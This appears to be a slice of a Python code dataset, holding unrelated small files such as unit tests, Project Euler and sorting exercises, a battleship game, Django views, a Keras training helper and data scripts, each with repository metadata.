import TestCase\nfrom parameterized import parameterized_class\nimport pandas as pd\nimport numpy as np\nfrom dprecs.auctions import (\n get_auction_outputs,\n get_dm_metrics,\n run_paper_auction,\n run_auction_group,\n)\n\n\nclass MockConfigs:\n def __init__(self):\n auction_cols = [\n \"eBPM\",\n \"eBPMrank\",\n \"eRPM\",\n \"price\",\n \"CTR_dm\",\n \"surplus_dm\",\n \"eRPM_dm\",\n \"CTR_dr\",\n \"surplus_dr\",\n \"eRPM_dr\",\n ]\n self.GLOBAL_PCTR = 0.05\n self.SERVER_PCTR = \"server_pCTRs\"\n self.PERSONALIZED_PCTR = \"pers_pCTRs\"\n self.BID = \"bids\"\n self.RESERVE = \"reserve\"\n self.CLICK=\"clicks\"\n self.PROBA=\"probas\"\n self.GLOBAL_AUCTION_COLS = [col + \"_global\" for col in auction_cols]\n self.SERVER_AUCTION_COLS = [col + \"_server\" for col in auction_cols]\n self.PERSONALIZED_AUCTION_COLS = [col + \"_personalized\" for col in auction_cols]\n self.GLOBAL_BOAS_CONFIGS = {}\n self.BOAS_CONFIGS = {}\n self.NUM_FINALISTS = \"num_finalists\"\n\n\n@parameterized_class(\n [\n {\n \"server_pCTRs\": pd.Series([0.1, 0.5, 0.3, 0.2, 0.01], name=\"server_pCTRs\"),\n \"clicks\": pd.Series([0, 0, 1, 0, 0], name=\"clicks\"),\n \"probas\": pd.Series([1.0, 1.0, 1.0, 1.0, 1.0], name=\"probas\"),\n \"pers_pCTRs\": pd.Series([0.2, 0.45, 0.6, 0.2, 0.05], name=\"pers_pCTRs\"),\n \"bids\": pd.Series([10.0, 1.0, 6.0, 5.0, 15.0], name=\"bids\"),\n \"reserve\": 1.0,\n \"exp_eBPMs\": pd.Series([1000, 500, 1800, 1000, 150]),\n \"exp_eBPM_ranks\": pd.Series([2, 4, 1, 3, 5]),\n \"exp_eRPMs\": pd.Series([1000, 150, 1000, 500, 1 * 1000 * 0.01]),\n \"exp_prices\": pd.Series([10, 0.3, 1 / 0.3, 2.5, 1]),\n \"exp_CTR\": pd.Series([0.2, 0.45, 0.6, 0.2, 0.05]),\n \"exp_revenue\": pd.Series([2000, 135, 2000, 500, 50]),\n \"exp_surplus\": pd.Series([0, 0.7 * 0.45, 1.6, 0.5, 0.7]),\n \"bag_configs\": [\n {\n \"bag_scores\": \"eBPM\",\n \"bag_cutoff\": 1,\n \"pvt_scores\": \"pers_eBPM\",\n \"mode\": \"g\",\n },\n ],\n \"exp_bag_ranks\": [[0, 0, 1, 0, 0]],\n \"configs\": MockConfigs(),\n },\n ]\n)\nclass TestAuction(TestCase):\n def setUp(self):\n self.df = pd.concat([self.server_pCTRs, self.pers_pCTRs, self.bids, self.clicks, self.probas], axis=1)\n self.df[self.configs.RESERVE] = self.reserve\n\n def test_get_auction_outputs(self):\n exp_outputs = [\n self.exp_eBPMs,\n self.exp_eBPM_ranks,\n self.exp_eRPMs,\n self.exp_prices,\n ]\n computed_outputs = get_auction_outputs(\n self.server_pCTRs, self.bids, self.reserve\n )\n for i, output in enumerate(exp_outputs):\n np.testing.assert_allclose(output, computed_outputs[i])\n\n def test_get_dm_metrics(self):\n exp_metrics = [self.pers_pCTRs, self.exp_surplus, self.exp_revenue]\n computed_metrics = get_dm_metrics(self.exp_prices, self.bids, self.pers_pCTRs)\n for i, output in enumerate(exp_metrics):\n np.testing.assert_allclose(output, computed_metrics[i])\n\n def test_run_paper_auction(self):\n exp_stats = [\n self.exp_eBPMs,\n self.exp_eBPM_ranks,\n self.exp_eRPMs,\n self.exp_prices,\n self.exp_CTR,\n self.exp_surplus,\n self.exp_revenue,\n ]\n exp_stats.extend(self.exp_bag_ranks)\n computed_stats = run_paper_auction(\n self.server_pCTRs,\n self.bids,\n self.pers_pCTRs,\n self.reserve,\n self.clicks,\n self.probas,\n bag_configs=self.bag_configs,\n )\n for i, output in enumerate(exp_stats):\n np.testing.assert_allclose(output, computed_stats[i])\n\n def test_run_auction_group(self):\n exp_df_shape = (5, 37)\n computed_df = run_auction_group(self.df, self.configs, run_paper_auction)\n np.testing.assert_equal(exp_df_shape, 
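# [Hedged aside] The fixture values above are consistent with eBPM being
# pCTR * bid * 1000 and the auction ranking by descending eBPM; a quick
# numpy replay of the first test case:
import numpy as np

pctr = np.array([0.1, 0.5, 0.3, 0.2, 0.01])
bids = np.array([10.0, 1.0, 6.0, 5.0, 15.0])
ebpm = pctr * bids * 1000
assert np.allclose(ebpm, [1000, 500, 1800, 1000, 150])
order = ebpm.argsort()[::-1]   # candidate indices from best to worst
assert order[0] == 2           # the 1800-eBPM candidate wins the auction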
computed_df.shape)\n","repo_name":"apple/ml-dprecs","sub_path":"tests/unit_tests/test_auctions.py","file_name":"test_auctions.py","file_ext":"py","file_size_in_byte":4259,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"78"} +{"seq_id":"71079985532","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n################################################################################\n# Euler 39\n# Integer right triangles\n# Author: Eugene Kolo - 2014\n# Contact: www.eugenekolo.com\n\n# If p is the perimeter of a right angle triangle with integral length sides, {a,b,c}, \n# there are exactly three solutions for p = 120.\n# {20,48,52}, {24,45,51}, {30,40,50}\n# For which value of p ≤ 1000, is the number of solutions maximised?\n################################################################################\ndef solve():\n import math\n\n LIMIT = 1000\n perims = [0 for i in range(0,LIMIT+1)] # List of number of solutions per perimeter\n for a in range(1,int(LIMIT/3)):\n for b in range(a,math.floor((LIMIT-a)/2)):\n c = math.sqrt(a**2 + b**2)\n p = int(a + b + c) # Perimeter \n if (c % 1 == 0 and p <= LIMIT): # Integer solution \n perims[p] += 1 # Solution hit\n\n return perims.index(max(perims)) # Print the index with the highest hits\n\nif __name__ == '__main__':\n print(solve())\n","repo_name":"eugenekolo/project-euler","sub_path":"euler039.py","file_name":"euler039.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"30575913948","text":"edad=int(input(\"Ingresa tu edad: \"))\n\ndef evaluaEdad(edad):\n\n\tif edad<0:\n\t\traise NameError(\"Edad no válida\")\n\n\tif edad<20:\n\t\treturn \"Eres muy joven\"\n\telif edad<40:\n\t\treturn \"Eres joven\"\n\telif edad<65:\n\t\treturn \"Eres maduro\"\n\telif edad<100:\n\t\treturn \"Cuídate...\"\n\ntry:\n\tprint(evaluaEdad(edad))\nexcept NameError:\n\tprint(\"Has introducido una edad no válida\")\nfinally:\n\tprint(\"El programa ha finalizado\")","repo_name":"WillOsoc/CursoPython","sub_path":"23_Excepciones2.py","file_name":"23_Excepciones2.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"10718600188","text":"import pandas\n\n# Reading data\ndf = pandas.read_csv('aria.csv', sep=';', parse_dates=['Date'])\n\n# Stores the highest Low value\nhighestLowValue = None\n# Count of the current high streak\nhighStreak = 0\n# Can be buy, hold, sell\naction = None\n# Indicates if a buy has been executed.\nbuy = False\n# Stores the lowest Low value\nlowestLowValue = None\n# Cound of the current low streak\nlowStreak = 0\n# List of actions\nactions = []\n\nfor index, row in df.iterrows():\n curLowValue = row['Low']\n\n # First row will be handled differently\n # Setting highest Low value\n if not highestLowValue:\n highestLowValue = curLowValue\n # Setting highest Low value and counting the streak\n elif curLowValue >= highestLowValue:\n highestLowValue = curLowValue\n highStreak += 1\n else:\n # Resetting streak\n highStreak = 0\n\n # First row will be handled differently\n # Setting lowest Low value\n if not lowestLowValue:\n lowestLowValue = curLowValue\n # Setting lowest Low value and counting the streak\n elif curLowValue < lowestLowValue:\n lowestLowValue = curLowValue\n lowStreak += 1\n else:\n # Resetting streak\n lowStreak = 0\n\n # Setting action depending on action and buy execution\n if (action is None 
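# [Illustrative check] For the Euler solution above, p = 120 should admit
# exactly the three triangles quoted in its header comment:
triples = [(a, b, 120 - a - b)
           for a in range(1, 120) for b in range(a, 120)
           if 120 - a - b > 0 and a * a + b * b == (120 - a - b) ** 2]
assert triples == [(20, 48, 52), (24, 45, 51), (30, 40, 50)]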
or action != 'buy') and not buy and highStreak == 2:\n action = \"buy\"\n buy = True\n elif buy and lowStreak == 2:\n action = \"sell\"\n buy = False\n else:\n action = \"hold\"\n\n actions.append(action)\n\n# Appending column\ndf['Action'] = actions\n\npandas.set_option('display.max_rows', None)\nprint(df)\n\ndf.to_csv('aria-out.csv', sep=';', encoding='utf-8')\n","repo_name":"captain-bu/aria-finance","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"19680039423","text":"from setuptools import setup\nimport platform\nmachine = platform.machine()\n\nsetup( \n name='demographics',\n \n version='0.11',\n description='Face demographics based on age and gender',\n url='http://demo.vedalabs.in/',\n\n # Author details \n author='Atinderpal Singh',\n author_email='atinderpalap@gmail.com',\n\n packages=['demographics'],\n install_requires=['numpy'] if machine=='x86_64' else ['numpy'],\n package_data={\n 'demographics':['model_age/checkpoint*', 'model_gender/checkpoint*'],\n },\n\n zip_safe=False\n )\n","repo_name":"MacherLabs/demographics","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"71216054651","text":"# Faça um Programa que peça um número correspondente a um determinado ano e em seguida informe se este ano é ou não bissexto.\n\ntry:\n # Pedir o ano para o usuário e atribuir a uma variável\n year = input('Informe o ano: ')\n # alterar o tipo da variável para o tipo inteiro\n year = int(year)\n # declarar uma variável 'bissexto' para receber o resultado das estruturas de decisão\n leapYear = None\n # verificar se o ano é múltiplo de 100\n if (year%100) == 0 :\n # se for múltiplo de 100 deve-se verificar se é divisível por 400\n if (year%400) == 0:\n # se for divisível por 400 o ano é bissexto, então atribuir o valor 'True' para a variável 'bissexto'\n leapYear = True\n # se for indivisível por 400 o ano não é bissexto, então atribuir o valor 'False\" para a variável 'bissexto'\n else:\n leapYear = False\n # se não for múltiplo de 100 deve-se verificar se é divisível por 4\n else:\n if (year%4) == 0:\n # se for divisível por 4 o ano é bissexto, então atribuir o valor 'True' para a variável 'bissexto'\n leapYear = True\n # se for indivisível por 4 a ano não é bissexto, então atribuir o valor 'False\" para a variável 'bissexto'\n else:\n leapYear = False\n # imprimir na tela o resultado da decisão\n if leapYear == True:\n print('O ano informado é bissexto.')\n else:\n print('O ano informado não é bissexto.')\nexcept:\n print('Erro!')","repo_name":"glaucomori/PythonProjects","sub_path":"ListaDeExercícios_PythonBrasil/02-Estrutura_de_Decisão/practice17.py","file_name":"practice17.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1636121847","text":"import os\r\n\r\nafinn_path = os.path.join(os.path.dirname(__file__), 'AFINN-111.txt')\r\nwith open(afinn_path, 'r') as f:\r\n afinn = dict(map(str.strip, line.split('\\t')) for line in f)\r\n\r\n# Define a function to calculate the sentiment score of a text using the AFINN lexicon\r\ndef calculate_sentiment(text):\r\n words = text.split()\r\n score = sum([int(afinn.get(word.lower(), 0)) for word in words])\r\n print(len(words))\r\n return 
score\r\n\r\n\r\n\r\ntext1 = \"The product is very good. I liked it.\"\r\n\r\nobj = calculate_sentiment(text1)\r\nprint(obj)","repo_name":"abm2707/Amazon_final","sub_path":"Amazon23/sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"43142122586","text":"import pandas as pd\nimport json\nimport requests\nimport read_credentials\n\ndef get_metadata(credentials_path=None, query_url = 'https://api.github.com/repos/mlflow/mlflow'):\n\n params = {\"page\": \"1\", \"per_page\": \"100\"}\n headers = {\"Accept\": \"application/vnd.github.v3+json\"}\n TOKEN = read_credentials.get_credentials(credentials_path)\n auth = ('sjster', TOKEN)\n\n r = requests.get(query_url, headers=headers, params=params, auth=auth)\n repo_data = r.json()\n\n if(r.status_code == 200):\n print(repo_data['created_at'])\n print(repo_data['updated_at'])\n print(repo_data['forks_count'])\n print(repo_data['open_issues'])\n print(repo_data['stargazers_count']) # stars\n print(repo_data['subscribers_count']) # watchers\n\n repo_metadata = {'created_at': repo_data['created_at'],\n 'updated_at': repo_data['updated_at'],\n 'forks_count': repo_data['forks_count'],\n 'open_issues': repo_data['open_issues'],\n 'starred': repo_data['stargazers_count'],\n 'watchers': repo_data['subscribers_count']}\n\n with open('data/mlflow_metadata.json','w') as f:\n json.dump(repo_metadata, f)\n\n return_val = 0\n else:\n reason = r.reason\n return_val = r.status_code\n print(f'Request failed with error {return_val} with {reason}')\n\n return(return_val)\n\n\nif __name__ == '__main__':\n return_val = get_metadata(credentials_path)\n","repo_name":"sjster/mlflow_dashboard","sub_path":"get_repo_metadata.py","file_name":"get_repo_metadata.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7048571455","text":"from django.shortcuts import get_object_or_404\nfrom rest_framework import viewsets\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import action\n\nfrom .models import Mailing, Client, Message\nfrom .serializers import MailingSerializer, ClientSerializer, MessageSerializer\n\n\nclass ClientViewSet(viewsets.ModelViewSet):\n serializer_class = ClientSerializer\n queryset = Client.objects.all()\n\n\nclass MessageViewSet(viewsets.ModelViewSet):\n serializer_class = MessageSerializer\n queryset = Message.objects.all()\n\n\nclass MailingViewSet(viewsets.ModelViewSet):\n serializer_class = MailingSerializer\n queryset = Mailing.objects.all()\n\n @action(detail=True, methods=['get'])\n def info(self, request, pk=None):\n get_object_or_404(Mailing, pk=pk)\n messages_qs = Message.objects.filter(mailing_id=pk)\n serializer = MessageSerializer(messages_qs, many=True)\n return Response(serializer.data)\n\n @action(detail=False, methods=['get'])\n def fullinfo(self, request):\n total_count = Mailing.objects.count()\n mailings = Mailing.objects.values('id')\n content = {\n 'Total number of mailings': total_count,\n 'The number of messages sent': '',\n }\n result = {}\n\n for mailing in mailings:\n message = Message.objects.filter(mailing_id=mailing['id'])\n mailing_result = {\n 'Total messages': 0,\n Message.SENT: 0,\n Message.NO_SENT: 0\n }\n count_sent = message.filter(status=Message.SENT).count()\n count_no_sent = message.filter(status=Message.NO_SENT).count()\n\n mailing_result['Total messages'] 
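# [Illustrative sketch] The per-mailing tally being filled in above is a
# group-by-status count; outside the ORM the same shape falls out of
# collections.Counter ("sent"/"no_sent" stand in for Message.SENT/NO_SENT):
from collections import Counter

statuses = ["sent", "sent", "no_sent", "sent"]   # stand-in message rows
tally = Counter(statuses)
mailing_result_demo = {"Total messages": len(statuses),
                       "sent": tally["sent"], "no_sent": tally["no_sent"]}
assert mailing_result_demo == {"Total messages": 4, "sent": 3, "no_sent": 1}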
= len(message)\n mailing_result[Message.SENT] = count_sent\n mailing_result[Message.NO_SENT] = count_no_sent\n\n result[mailing['id']] = mailing_result\n\n content['The number of messages sent'] = result\n return Response(content)\n","repo_name":"s3r3ga/sms_messages","sub_path":"sms_msgs/sms/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1995,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"35577740366","text":"from time import time\nfrom typing import Callable, Optional, Union, Tuple\n\nimport numpy as np\nfrom keras.callbacks import EarlyStopping, TensorBoard, Callback\nfrom keras.optimizers import RMSprop\n\nimport wandb\nfrom wandb.keras import WandbCallback\n\nfrom datasets.base import Dataset\nfrom models.base import Model\nfrom training.gpu_util_sampler import GPUUtilizationSampler\n\n\nEARLY_STOPPING = False\nGPU_UTIL_SAMPLER = False\n\nclass Metrics(Callback):\n\n def on_train_begin(self, logs={}):\n self.val_precisions = []\n self.val_profits = []\n \n def on_epoch_end(self, epoch, logs={}):\n val_predict = (np.asarray(self.model.predict(self.validation_data[0]))).round()[:,0]\n val_targ = self.validation_data[1][:,0]\n \n true_positives = np.sum(np.round(val_predict * val_targ))\n false_positives = np.sum(np.round(val_predict * (1-val_targ)))\n predicted_positives = np.sum(np.round(val_predict))\n _val_precision = true_positives / (predicted_positives + 1e-7)\n _val_profit = 96 * true_positives - 104 * false_positives\n self.val_precisions.append(_val_precision)\n self.val_profits.append(_val_profit)\n print (f'- val_precision: {_val_precision} - val_profit: {_val_profit}')\n wandb.log({'val_precision': _val_precision, 'val_profit': _val_profit})\n return\n \n\n\ndef train_model(model: Model, dataset: Dataset, epochs: int, batch_size: int, learning_rate: float, gpu_ind: Optional[int]=None, use_wandb=False) -> Model:\n callbacks = []\n\n callbacks.append(Metrics())\n \n if EARLY_STOPPING:\n early_stopping = EarlyStopping(monitor='val_loss', min_delta=0.01, patience=3, verbose=1, mode='auto')\n callbacks.append(early_stopping)\n\n if GPU_UTIL_SAMPLER and gpu_ind is not None:\n gpu_utilization = GPUUtilizationSampler(gpu_ind)\n callbacks.append(gpu_utilization)\n\n if use_wandb:\n wandb = WandbCallback()\n callbacks.append(wandb)\n\n model.network.summary()\n\n t = time()\n history = model.fit(dataset, batch_size, epochs, learning_rate, callbacks)\n print('Training took {:2f} s'.format(time() - t))\n\n if GPU_UTIL_SAMPLER and gpu_ind is not None:\n gpu_utilizations = gpu_utilization.samples\n print(f'GPU utilization: {round(np.mean(gpu_utilizations), 2)} +- {round(np.std(gpu_utilizations), 2)}')\n\n return model\n","repo_name":"toolkmit/algotrading","sub_path":"training/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2395,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"3163902041","text":"def mergeSort(array,low,high):\n if(low >= high): return\n mid=(low+high)//2\n mergeSort(array,low,mid)\n # print(array[low:high])\n mergeSort(array,mid+1,high)\n # print(array[low:high])\n merge(array,low,mid,high)\n # print(array)\n\ndef merge(array,low,mid,high):\n temp=[]\n left=low\n right=mid+1\n while(left<=mid and right<=high):\n if(array[left] <= array[right]):\n temp.append(array[left])\n left+=1\n else:\n temp.append(array[right])\n right+=1\n while(left <=mid):\n temp.append(array[left])\n left+=1\n while(right<=high):\n 
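# [Hedged check] In the Keras callback above, profit is a fixed payoff per
# true positive minus a fixed cost per false positive; replaying the
# arithmetic on toy arrays:
import numpy as np

val_predict = np.array([1.0, 1.0, 0.0, 1.0])
val_targ = np.array([1.0, 0.0, 0.0, 1.0])
tp = np.sum(np.round(val_predict * val_targ))          # 2 true positives
fp = np.sum(np.round(val_predict * (1 - val_targ)))    # 1 false positive
precision = tp / (np.sum(np.round(val_predict)) + 1e-7)
profit = 96 * tp - 104 * fp
assert profit == 88.0 and abs(precision - 2 / 3) < 1e-6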
temp.append(array[right])\n right+=1\n for i in range (low,high+1):\n array[i]=temp[i-low]\n\narray=[]\nn=int(input(\"enter length of array:\"))\nfor i in range (n):\n array.append(int(input(\"element: \")))\nprint(array)\nprint(mergeSort(array,0,n-1))\n","repo_name":"Ha-ri-ka/DSA-Practice","sub_path":"Basics/Sorting Algorithms/mergeSort.py","file_name":"mergeSort.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"24550343468","text":"from pcinput import getString\r\nfrom random import randint\r\n\r\nEMPTY = \".\"\r\nBATTLESHIP = \"X\"\r\nSHIPS = 3\r\nWIDTH = 4\r\nHEIGHT = 3\r\n\r\ndef displayBoard( b ):\r\n print( \" \", end=\"\" )\r\n for col in range( WIDTH ):\r\n print( chr( ord(\"A\")+col ), end=\" \" )\r\n print()\r\n for row in range( HEIGHT ):\r\n print( row+1, end=\" \")\r\n for col in range( WIDTH ):\r\n print( b[row][col], end=\" \" )\r\n print()\r\n\r\ndef placeBattleships( b ):\r\n for i in range( SHIPS ):\r\n while True:\r\n x = randint( 0, WIDTH-1 )\r\n y = randint( 0, HEIGHT-1 )\r\n if b[y][x] == BATTLESHIP:\r\n continue\r\n if x > 0 and b[y][x-1] == BATTLESHIP:\r\n continue\r\n if x < WIDTH-1 and b[y][x+1] == BATTLESHIP:\r\n continue\r\n if y > 0 and b[y-1][x] == BATTLESHIP:\r\n continue\r\n if y < HEIGHT-1 and b[y+1][x] == BATTLESHIP:\r\n continue\r\n break\r\n b[y][x] = BATTLESHIP\r\n \r\ndef getTarget():\r\n while True:\r\n cell = getString( \"Which cell do you target? \" ).upper()\r\n if len( cell ) != 2:\r\n print( \"Please enter a cell as XY,\",\r\n \"where X is a letter and Y a digit\" )\r\n continue\r\n if cell[0] not in \"ABCD\":\r\n print( \"The first character of the cell\",\r\n \"should be a letter in the range A-\"+\r\n chr( ord(\"A\")+WIDTH-1 ) )\r\n continue\r\n if cell[1] not in \"123\":\r\n print( \"The second character of the cell should be\",\r\n \"a digit in the range 1-\"+str( HEIGHT ) )\r\n continue\r\n return ord(cell[0])-ord(\"A\"), ord(cell[1])-ord(\"1\") \r\n \r\nboard = []\r\nfor i in range( HEIGHT ):\r\n row = WIDTH * [EMPTY]\r\n board.append( row )\r\nplaceBattleships( board )\r\ndisplayBoard( board )\r\n\r\nhits = 0\r\nmoves = 0\r\nwhile hits < SHIPS:\r\n x, y = getTarget()\r\n if board[y][x] == BATTLESHIP:\r\n print( \"You sunk my battleship!\" )\r\n board[y][x] = EMPTY\r\n hits += 1\r\n else:\r\n print( \"Miss!\" )\r\n moves += 1\r\n\r\nprint( \"You needed\", moves, \"moves to sink all battleships.\" )","repo_name":"arvinmv/open-notes","sub_path":"Intro to CS with Python/src/solutions/answer1207.py","file_name":"answer1207.py","file_ext":"py","file_size_in_byte":2208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"36743400687","text":"import sacred\nfrom sacred.observers import FileStorageObserver\nfrom simulation_logic import do_one_parameter_config\nimport numpy as np\n\nex = sacred.Experiment(\"simulation\")\nex.observers.append(FileStorageObserver(\"data\"))\n\n\n@ex.config\ndef cfg(): \n rx1 = 0.75\n ry1 = 0.125\n dist = 0.15\n cx1 = -rx1 - dist /2.\n cy1 = 0\n AS1 = 15.\n cx2 = -cx1\n cy2 = cy1\n rx2 = rx1\n ry2 = ry1\n AS2 = AS1\n nr = 1\n ang = nr / 180. 
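# [Minimal aside] The `ang` line above is the usual degrees-to-radians
# conversion; math.radians computes the same quantity:
import math

nr = 1
assert abs(nr / 180. * math.pi - math.radians(nr)) < 1e-12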
* np.pi\n nft = 80\n nx1 = 31\n ny1 = 81\n nx2 = 100\n ny2 = 50\n q = 1.035\n err_0 = 1e-4\n err_w = 1e-4\n num_iter = 500\n dt0 = 5e-4\n aq = 0\n xis = 5e-2\n t_save = 0\n n_expos = 80\n ns = 5\n dt_save = ns * n_expos * dt0\n gpx = 10\n gpy = 8\n gamma = 0.045\n zeta = 15.\n \n kkappa = 0\n lambdat = 0\n gp = 0\n \n sp = 1.5\n \n bf = 10 * gamma\n \n psi = 0\n\n poff = 20.\n \n pn1 = 15.\n pn2 = pn1 / 20.\n \n pu = poff / 2.\n\n \n pm = 12.\n bell_shape_x = 8.\n bell_shape_y = 8.\n\n eta = 1.\n a = 1.\n ka = 0.8\n pei0 = 0.001\n\n\n\n@ex.automain\ndef run_one_simulation(_config, _run):\n do_one_parameter_config(\n cx1=_config[\"cx1\"],\n cy1=_config[\"cy1\"],\n rx1=_config[\"rx1\"],\n ry1=_config[\"ry1\"],\n AS1=_config[\"AS1\"],\n cx2=_config[\"cx2\"],\n cy2=_config[\"cy2\"],\n rx2=_config[\"rx2\"],\n ry2=_config[\"ry2\"],\n AS2=_config[\"AS2\"],\n ang=_config[\"ang\"],\n dist=_config[\"dist\"],\n nx1=_config[\"nx1\"],\n ny1=_config[\"ny1\"],\n nx2=_config[\"nx2\"],\n ny2=_config[\"ny2\"],\n q=_config[\"q\"],\n err_0=_config[\"err_0\"],\n err_w=_config[\"err_w\"],\n num_iter=_config[\"num_iter\"],\n dt0=_config[\"dt0\"],\n aq=_config[\"aq\"],\n t_save=_config[\"t_save\"],\n dt_save=_config[\"dt_save\"],\n gpx=_config[\"gpx\"],\n gpy=_config[\"gpy\"],\n gamma=_config[\"gamma\"],\n zeta=_config[\"zeta\"],\n kkappa=_config[\"kkappa\"],\n lambdat=_config[\"lambdat\"],\n gp=_config[\"gp\"],\n poff=_config[\"poff\"],\n pn1=_config[\"pn1\"],\n pn2 =_config[\"pn2\"],\n pu=_config[\"pu\"],\n pm=_config[\"pm\"],\n bell_shape_x=_config[\"bell_shape_x\"],\n bell_shape_y=_config[\"bell_shape_y\"],\n xis=_config[\"xis\"],\n eta=_config[\"eta\"],\n n_expos=_config[\"n_expos\"],\n sp=_config[\"sp\"],\n a = _config[\"a\"],\n bf= _config[\"bf\"],\n ka= _config[\"ka\"],\n psi= _config[\"psi\"],\n pei0= _config[\"pei0\"],\n nft= _config[\"nft\"],\n SAVE=True,\n ex=ex,\n SAVE_data=True\n )\n","repo_name":"fy26/ActiveMatter","sub_path":"Simulation/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"25550770609","text":"import pygame, sys\r\nfrom pygame.locals import *\r\n\r\n'''\r\nNOMBRE: FABRICIO\r\nAPELLIDO: DE SA TORRES\r\nDIVISIÓN: B\r\nEJERCICIO: Ejercicio 03 (Imagenes Pygame)\r\nESTADO: Ejercicio entregado\r\n'''\r\n\r\nBLANCO = (255,255,255) \r\nROJO = (255,0,0)\r\nAZUL = (0,0,255)\r\nVERDE = (0,255,0)\r\nCELESTE = (0,150,255)\r\nNEGRO = (0,0,0) \r\n\r\npygame.init()\r\n\r\nventana = pygame.display.set_mode((1500,1000))\r\n\r\npygame.display.set_caption(\"Ejercicio 3 - Imágenes Pygame\")\r\n\r\nfuente = pygame.font.SysFont(\"Arial\",30)\r\n\r\nimagen1 = pygame.image.load(\"CLASE 04\\serpiente.png\")\r\nimagen1 = pygame.transform.scale(imagen1, (100,100))\r\n\r\nimagen2 = pygame.image.load(\"CLASE 04\\control.png\")\r\nimagen2 = pygame.transform.scale(imagen2, (100,100))\r\n\r\n\r\nimagen3 = pygame.image.load(\"CLASE 04\\compu.png\")\r\nimagen3 = pygame.transform.scale(imagen3, (100,100))\r\n\r\na1 = {\"nombre\":\"serpiente\",\"edad\":3,\"imagen\":imagen1}\r\na2 = {\"nombre\":\"control\",\"edad\":11,\"imagen\":imagen2}\r\na3 = {\"nombre\":\"compu\",\"edad\":2,\"imagen\":imagen3}\r\nlista_imagenes = [a1,a2,a3]\r\n\r\nventana.fill(ROJO)\r\n\r\nflag_run = True\r\ny = 50\r\nwhile flag_run:\r\n lista_eventos = pygame.event.get()\r\n for evento in lista_eventos:\r\n if evento.type == pygame.QUIT:\r\n flag_run = False\r\n \r\n for datos in lista_imagenes:\r\n nombre = 
datos[\"nombre\"]\r\n edad = str(datos[\"edad\"])\r\n imagen = datos[\"imagen\"]\r\n\r\n ventana.blit(imagen,(50,y))\r\n\r\n texto_nombre = fuente.render(nombre,False,BLANCO,NEGRO)\r\n ventana.blit(texto_nombre,(160,y))\r\n\r\n texto_edad = fuente.render(edad,False,BLANCO,NEGRO)\r\n ventana.blit(texto_edad,(270,y))\r\n\r\n y += 110\r\n\r\n if y > 270:\r\n y = 50\r\n \r\n \r\n\r\n pygame.display.update()\r\npygame.quit()","repo_name":"FABRIDESA/Programacion-y-Laboratorio-I","sub_path":"EJERCICIOS/3/Ejercicio 03 (Imagenes Pygame).py","file_name":"Ejercicio 03 (Imagenes Pygame).py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"9157816524","text":"# -*- coding: utf-8 -*-\n# @Software: PyCharm\n# @File: PythonExecutemany.py\n\nimport pymysql\n\n# 数据库连接信息\nhost = ''\nusername = ''\npassword = ''\ndb = ''\nconnect = pymysql.connect(host=host, user=username, password=password, database=db, charset=\"utf-8\")\ncursors = connect.cursor()\n\nxing_lists = ['pan', 'lang', 'jiang', 'gong', 'gan', 'yu', 'hao', 'xia', 'que', 'tian', 'zhang', 'long', 'dou', 'guo',\n 'wen', 'wei', 'ren', 'jiao', 'gu', 'sang', 'chen', 'xu', 'zhuo', 'bing', 'zhen', 'ding', 'ye', 'wo',\n 'feng', 'wan', 'zhuang', 'zui', 'liang', 'heng', 'mei', 'huan', 'xue', 'dang', 'bu', 'yuan', 'liu',\n 'chai', 'qin', 'liao', 'lin', 'xing', 'bei', 'dong', 'yun', 'wu', 'gui', 'fu', 'qiang', 'ling', 'huo',\n 'jia', 'pei', 'lao', 'mo', 'qiu', 'ning', 'xian', 'shu', 'chang', 'zi', 'tu', 'you', 'ying', 'hong',\n 'duan', 'zhai', 'han', 'sha', 'gou', 'tan', 'shui', 'kan', 'zhan', 'kuang', 'kui', 'sun', 'xun', 'hang',\n 'tai', 'geng', 'leng', 'zu', 'lai', 'zai', 'peng', 'ben', 'ni', 'che', 'tang', 'ping', 'bao', 'mao',\n 'shan', 'hu', 'zhi', 'kang', 'sheng', 'min', 'xiong', 'zou', 'cong', 'neng', 'zuo', 'mi', 'nie', 'ji',\n 'kuai', 'shou', 'xie', 'ba', 'ju', 'ke', 'zan', 'fan', 'lan', 'xin', 'hou', 'mong', 'shuang', 'chong',\n 'ru', 'su', 'yang', 'kou', 'ran', 'du', 'qian', 'zhao', 'yi', 'zhu', 'pu', 'bai', 'zong', 'miao', 'suo',\n 'li', 'cheng', 'cen', 'song', 'di', 